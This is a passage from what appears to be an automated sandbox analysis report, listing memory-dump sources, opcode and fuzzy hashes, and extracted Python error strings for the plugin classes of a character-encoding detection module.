                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                                                          • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                                                                          • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                                                                          • Opcode ID: 5ca945e71462204c3220177ec9e6a27065e7f9c311bd085c84fc819a6770995f
                                                                                                                                                                                                                                                                          • Instruction ID: 526407ee24285636040eabb839cec9760031b7aad08a5f22980eb5cd82456dfa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ca945e71462204c3220177ec9e6a27065e7f9c311bd085c84fc819a6770995f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641B362B58A9382FB588B1DDC5037D6361EB04BE0F881137DA5E47EE4DE2DE892D300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                                                                          • String ID: ratio
                                                                                                                                                                                                                                                                          • API String ID: 2538524772-4234197119
                                                                                                                                                                                                                                                                          • Opcode ID: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
                                                                                                                                                                                                                                                                          • Instruction ID: 835a010c73536d749f2d31ab37ef8b38518e017dd99782cba5abb6144e615d91
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6cb76a82c0156d83f652a4623d6809029c4d4441d1b486eb3f0817f7220173e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1417C22D0964682E6749F25981427D63A0AF49BACF0C0233DE5D57EF9FFBEE4458740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_symbol_count' cannot be deleted$attribute '_symbol_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-2291034628
                                                                                                                                                                                                                                                                          • Opcode ID: 005893139290546e466727384096f8c4c27f16b4c59161034916739a6ab1bdf9
                                                                                                                                                                                                                                                                          • Instruction ID: 24f3eae3aa9ac481606cc0f779e1d50c84a828951aed74bd7b4b0fdfc98ecc57
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 005893139290546e466727384096f8c4c27f16b4c59161034916739a6ab1bdf9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C316661B0850282EEA49F25E45427D2360EF44BA8F5C4232DA5D47FF9FEAED495C740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted$attribute '_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-1212817586
                                                                                                                                                                                                                                                                          • Opcode ID: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
                                                                                                                                                                                                                                                                          • Instruction ID: 99f1910deb66c60c675d3245a447e902fa5b16b44653000c3c25291842deedc2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16b82e3689da71a62fdb9f4fcb28de3a703054875de315429c3694e8e6cd4c3d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2318171F0C50281EE649B29E49527C23A0EF44B98F5C5132EA1D47BF5FEAEE584C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuspiciousRange' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousRange' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-3882440367
                                                                                                                                                                                                                                                                          • Opcode ID: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
                                                                                                                                                                                                                                                                          • Instruction ID: 34c8841586d39b9fc497820ce9d61b1efce418f34495615ef9df8373829b1cbf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edf70cb319030b3d86d441b19e0745afc740f480ca4045dac8bdcfc512da58eb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E317E62F0850282EA749B29E4A427C23A0EF45B98F5C4172DA5D47BF5FEBEE494C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_word_count' cannot be deleted$attribute '_bad_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-3520798986
                                                                                                                                                                                                                                                                          • Opcode ID: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
                                                                                                                                                                                                                                                                          • Instruction ID: 2b72ae2768ffe9be11cc31fbdaa8828f7d1c8426ac930e802679ac395ee78e4b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21317061F0C50682EE649B65E45427C23A0AF84B98F5C4132EA5E46BF5FEAEE5858700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArabicIsolatedFormPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArabicIsolatedFormPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-3970786323
                                                                                                                                                                                                                                                                          • Opcode ID: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
                                                                                                                                                                                                                                                                          • Instruction ID: a2ac7800489d5d51f32c5114aa666718425827656ec6c7fbd40ac5c2b6660604
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6331A071F0950281EF649B29E49427C2390EF44BA8F9C5133DA1E86BF5FEAEE485C740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'CjkInvalidStopPlugin' object attribute '_wrong_stop_count' cannot be deleted$attribute '_wrong_stop_count' of 'CjkInvalidStopPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-420147485
                                                                                                                                                                                                                                                                          • Opcode ID: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
                                                                                                                                                                                                                                                                          • Instruction ID: a87944db7f6091315b1ce9490237d7a8f828cde7c4cfec26e21412ce74bda603
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07319271F0C50291EE649B25E4952BC2390EF44B98F5C5132EA1E47BF5FEAEE985C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'UnprintablePlugin' object attribute '_unprintable_count' cannot be deleted$attribute '_unprintable_count' of 'UnprintablePlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-2997357838
                                                                                                                                                                                                                                                                          • Opcode ID: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
                                                                                                                                                                                                                                                                          • Instruction ID: 2f87772cc5e9fe8b32fb6779760d4ac6d7f19c07aa963b0bb0b04e0b8023443b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD318271F0850682EEA49F19E49527C2390EF44BA8F5C5132DA1E47BF5FEAEE485C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFEDD9585C8
                                                                                                                                                                                                                                                                          • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted, xrefs: 00007FFEDD95863C
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD9586C6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted$attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-528010561
                                                                                                                                                                                                                                                                          • Opcode ID: 2ca47d72e77a7153c4af469a22f98ddc2045af71414dbb353d6064c52d0c80cb
                                                                                                                                                                                                                                                                          • Instruction ID: d6d7c3549e23b1efc6f5b6db3706d7bd175b7b04daf997363d26d37da5522c05
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ca47d72e77a7153c4af469a22f98ddc2045af71414dbb353d6064c52d0c80cb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B931A261B1950282EB649B55E49427D2390FF44B9CF9C5132EA1E47BF4FEAEE4858300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD9562A6
                                                                                                                                                                                                                                                                          • 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted, xrefs: 00007FFEDD95621C
                                                                                                                                                                                                                                                                          • attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFEDD9561A8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted$attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-1864222365
                                                                                                                                                                                                                                                                          • Opcode ID: 5778859781aa3561020ceb3b05ef8ae724d89a4ce4f3630b9ef98cc72eb7347a
                                                                                                                                                                                                                                                                          • Instruction ID: 2cd35d2e8b6422e95bc0f62fcba73abfd580a53d9bf0b45098c4b911cd02666f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5778859781aa3561020ceb3b05ef8ae724d89a4ce4f3630b9ef98cc72eb7347a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A318371F0850281EE649B55E49527C23A0EF84B9CF5C4132DA1D87BF5FEAEE485C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • 'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted, xrefs: 00007FFEDD95676C
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD9567F6
                                                                                                                                                                                                                                                                          • attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined, xrefs: 00007FFEDD9566F8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuspiciousRange' object attribute '_suspicious_successive_range_count' cannot be deleted$attribute '_suspicious_successive_range_count' of 'SuspiciousRange' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-916769388
                                                                                                                                                                                                                                                                          • Opcode ID: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
                                                                                                                                                                                                                                                                          • Instruction ID: 01e592f19a01772f8980ee47e6c8f89f162ddbec4592c6d2bf177db735b08141
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32c8cc5da1c5a4c53662f2a02eb56b9d7fcea26900f0b6a46b27aacae368bd4d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3316261B08A0381EE649B25E49427D23A0EF44BACF5C5132DA1D47BF5FEAEE495C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-4184598959
                                                                                                                                                                                                                                                                          • Opcode ID: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
                                                                                                                                                                                                                                                                          • Instruction ID: 5b70448e1af497048f6de038fce0b7f68a0ec4917a6e32c8b96bb5ecfb385a30
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1318361F1890385EE649B25E49527D2390EF44B98F9C5132DA1E47FF5FEAEE484D300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD9563E6
                                                                                                                                                                                                                                                                          • attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFEDD9562E8
                                                                                                                                                                                                                                                                          • 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFEDD95635C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-543361526
                                                                                                                                                                                                                                                                          • Opcode ID: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
                                                                                                                                                                                                                                                                          • Instruction ID: 9c375b6eeeffededd5506dd2a53bf98528b1d311a522dd9e7039c71dbb35f072
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77318571B0850282EA749B55E45527D23A0EF44B98F5C5133DA5D47BF5FEBEE494C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFEDD9551BC
                                                                                                                                                                                                                                                                          • int, xrefs: 00007FFEDD955246
                                                                                                                                                                                                                                                                          • attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFEDD955148
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
